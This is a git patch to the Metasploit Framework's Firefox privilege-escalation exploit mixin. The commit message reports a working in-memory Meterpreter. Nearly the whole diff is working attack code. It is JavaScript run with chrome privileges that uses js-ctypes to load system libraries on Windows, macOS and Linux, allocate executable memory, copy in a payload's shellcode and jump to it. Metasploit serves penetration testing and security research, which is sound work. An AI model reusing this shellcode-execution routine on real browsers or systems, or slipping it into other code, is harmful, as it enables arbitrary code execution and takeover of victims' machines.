From 9bdf57076324597123befb3bf4d6db32a206ee4d Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 12 Mar 2014 02:19:28 -0500 Subject: [PATCH] All working now. In-memory meterpreter even. --- .../remote/firefox_privilege_escalation.rb | 74 ++++++++----------- 1 file changed, 32 insertions(+), 42 deletions(-) diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index 8768550b3f..7e4c045336 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -15,30 +15,26 @@ module Exploit::Remote::FirefoxPrivilegeEscalation # @return [String] javascript code containing the execShellcode() javascript fn def exec_shellcode_source %Q| - var execShellcode = function(shellcode) { - var LIBS = [ - "C:\\\\WINDOWS\\\\system32\\\\user32.dll", - "/usr/lib/libSystem.B.dylib", - "libc.so.6", - "libc.so" - ]; - + var execShellcode = function(shellcode, bytes) { Components.utils.import("resource://gre/modules/ctypes.jsm"); - var openLibs = function(libs) { - var i, lib; - for (i in libs) { - try { - lib = ctypes.open(libs[i]); - return lib; - } catch (e) {} - } - }; - - var lib = openLibs(LIBS); - if (!lib) throw new Error("Could not find lib in ["+LIBS+"]"); - var execPosix = function() { var RWX = 7, ANON_PRIVATE = 4098; + Components.utils.import("resource://gre/modules/ctypes.jsm"); + var LIBS = [ + "/usr/lib/libSystem.B.dylib", + "libc.so.6", + "libc.so" + ]; + + var i, lib; + for (i in LIBS) { + try { + lib = ctypes.open(LIBS[i]); + break; + } catch (e) {} + } + if (!lib) throw new Error("Could not find lib in ["+LIBS+"]"); + var mmap = lib.declare('mmap', ctypes.default_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ @@ -56,28 +52,21 @@ module Exploit::Remote::FirefoxPrivilegeEscalation ctypes.voidptr_t, /* src */ ctypes.size_t /* size to copy */ ); - var pthread_create = lib.declare('pthread_create', - ctypes.default_abi, /* calling convention */ - ctypes.int, /* return type */ - ctypes.voidptr_t, /* buffer to store thread struct */ - ctypes.voidptr_t, /* NULL */ - ctypes.voidptr_t, /* fn ptr */ - ctypes.voidptr_t /* NULL */ - ); + var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0); var pthread_buff = mmap(null, 4096, RWX, ANON_PRIVATE, 0, 0); - var bytes = encodeURI(shellcode).split(/%..\|./).length - 1; - memcpy(buff, ctypes.jschar.array()(shellcode), bytes); + var cstr = ctypes.jschar.array()(shellcode); + //var bytes = ctypes.char.array()(shellcode).length-1; + memcpy(buff, cstr, bytes); /* there is probably a better way to do this */ var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/); if (!m) throw new Error("Could not find address of buffer."); - var fn = ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16)); - //pthread_create(pthread_buff, ) + ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); }; var execWindows = function() { var RWX = 0x40, ANON_PRIVATE = 0x1000; - var VirtualAlloc = lib.declare('VirtualAlloc', + var VirtualAlloc = ctypes.open("Kernel32.dll").declare('VirtualAlloc', ctypes.winapi_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* start address (NULL here) */ @@ -85,22 +74,22 @@ module Exploit::Remote::FirefoxPrivilegeEscalation ctypes.unsigned_long, /* alloc type */ ctypes.unsigned_long /* protection flags */ ); - var memcpy = lib.declare('memcpy', + var memcpy = ctypes.open("ntdll.dll").declare('memcpy', ctypes.winapi_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* dest */ ctypes.voidptr_t, /* src */ ctypes.size_t /* size to copy */ ); - var buff = VirtualAlloc(null, shellcode.length, WIN.ANON_PRIVATE, WIN.RWX); - var bytes = encodeURI(shellcode).split(/%..\|./).length - 1; - memcpy(buff, ctypes.jschar.array()(shellcode), bytes); + var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX); + var cstr = ctypes.jschar.array()(shellcode); + memcpy(buff, cstr, bytes); var m = buff.toString().match(/"0x([0-9a-fA-F]+)"/); if (!m) throw new Error("Could not find address of buffer."); - ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); + ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); }; - var i, errs = [], fns = [execPosix, execWindows]; + var i, errs = [], fns = [execWindows, execPosix]; for (i in fns) { try { fns[i](shellcode); @@ -116,12 +105,13 @@ module Exploit::Remote::FirefoxPrivilegeEscalation # @return [String] javascript source code that kicks off the execution of the payload # For a javascript payload, this simply returns the payload source # For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode + # foreverwhile"\xeb\xfe" def run_payload return payload.encoded if js_target? %Q| #{exec_shellcode_source} - var sc = unescape("#{Rex::Text.to_unescape("\xcc"+payload.encoded+"\xc3")}"); - execShellcode(sc); + var sc = unescape("#{Rex::Text.to_unescape(payload.encoded)}"); + execShellcode(sc, #{payload.encoded.bytes.to_a.length}); | end